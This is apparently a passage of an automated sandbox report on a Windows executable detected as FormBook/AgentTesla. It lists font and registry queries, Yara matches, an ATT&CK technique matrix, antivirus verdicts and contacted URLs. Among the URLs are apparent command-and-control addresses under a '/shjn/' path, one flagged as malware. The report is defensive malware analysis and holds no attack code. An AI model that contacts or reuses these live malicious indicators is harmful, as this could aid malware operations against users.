Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\9LjOeq9jnl.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information:

Yara detected FormBook

Show sources

Source: Yara match	File source: 7.2.9LjOeq9jnl.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.9LjOeq9jnl.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.9LjOeq9jnl.exe.3b9bf30.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.9LjOeq9jnl.exe.3b50d10.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000011.00000002.561977714.0000000000990000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000000.396784808.0000000007957000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000000.378629628.0000000007957000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.343140057.0000000003A59000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.436667647.0000000000E90000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.562536876.0000000001350000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.436271319.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.562301653.0000000001010000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.436706282.0000000000ED0000.00000040.00020000.sdmp, type: MEMORY

Remote Access Functionality:

Yara detected FormBook

Show sources

Source: Yara match	File source: 7.2.9LjOeq9jnl.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.9LjOeq9jnl.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.9LjOeq9jnl.exe.3b9bf30.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.9LjOeq9jnl.exe.3b50d10.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000011.00000002.561977714.0000000000990000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000000.396784808.0000000007957000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000000.378629628.0000000007957000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.343140057.0000000003A59000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.436667647.0000000000E90000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.562536876.0000000001350000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.436271319.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.562301653.0000000001010000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.436706282.0000000000ED0000.00000040.00020000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Command and Scripting Interpreter2	Path Interception	Process Injection512	Masquerading1	Input Capture1	Security Software Discovery221	Remote Services	Input Capture1	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Shared Modules1	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Disable or Modify Tools1	LSASS Memory	Process Discovery2	Remote Desktop Protocol	Archive Collected Data1	Exfiltration Over Bluetooth	Ingress Tool Transfer3	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Virtualization/Sandbox Evasion31	Security Account Manager	Virtualization/Sandbox Evasion31	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Non-Application Layer Protocol3	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Process Injection512	NTDS	Remote System Discovery1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol13	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Deobfuscate/Decode Files or Information1	LSA Secrets	System Information Discovery112	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Obfuscated Files or Information4	Cached Domain Credentials	System Owner/User Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Software Packing3	DCSync	Network Sniffing	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	File Deletion1	Proc Filesystem	Network Service Scanning	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
9LjOeq9jnl.exe	32%	ReversingLabs	ByteCode-MSIL.Trojan.AgentTesla

Dropped Files

No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
7.2.9LjOeq9jnl.exe.400000.0.unpack	100%	Avira	TR/Crypt.ZPACK.Gen		Download File

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.typography.netana	0%	Avira URL Cloud	safe
http://www.carterandcone.com0	0%	Avira URL Cloud	safe
http://www.tiro.com	0%	URL Reputation	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://www.sajatypeworks.comeg	0%	Avira URL Cloud	safe
http://www.carterandcone.com	0%	URL Reputation	safe
http://fontfabrik.comur=u	0%	Avira URL Cloud	safe
http://www.collada.org/2005/11/COLLADASchema9Done	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/~	0%	URL Reputation	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://fontfabrik.com	0%	URL Reputation	safe
http://www.zhongyicts.com.cntaN	0%	Avira URL Cloud	safe
http://www.repsychel.com/shjn/?UTqtRv=Bck6v8Q7O88rutfkCywFCzEhcupnZwvilAlKH6TNYdqDwzSjrXWf51hg8vLZW/hTgHNK&Whc=0DHdArEp5hQd	0%	Avira URL Cloud	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.carterandcone.como._	0%	Avira URL Cloud	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/jp/S	0%	Avira URL Cloud	safe
http://www.tiro.&	0%	Avira URL Cloud	safe
http://www.tiro.com)	0%	Avira URL Cloud	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://www.sakkal.com	0%	URL Reputation	safe
www.anamentor.com/shjn/	100%	Avira URL Cloud	malware
http://www.jiyu-kobo.co.jp/jp/Z	0%	Avira URL Cloud	safe
http://www.carterandcone.comK	0%	Avira URL Cloud	safe
http://www.jiyu-kobo.co.jp/S	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp//nl	0%	Avira URL Cloud	safe
http://www.jiyu-kobo.co.jp/ww.ml	0%	Avira URL Cloud	safe
http://www.typography.neta	0%	Avira URL Cloud	safe
http://www.flex-aportelabels.com/shjn/?UTqtRv=M2Xo1sk/PcdvYlySg++E/1rcNB0ZJYFL6a/vKXHyKrNsPeuk4b/zAJjzao2c5vk7I5lO&Whc=0DHdArEp5hQd	0%	Avira URL Cloud	safe
http://www.jiyu-kobo.co.jp/H	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/Y0rs	0%	Avira URL Cloud	safe
http://www.jiyu-kobo.co.jp/C	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/jp/	0%	URL Reputation	safe
http://www.carterandcone.comi	0%	URL Reputation	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
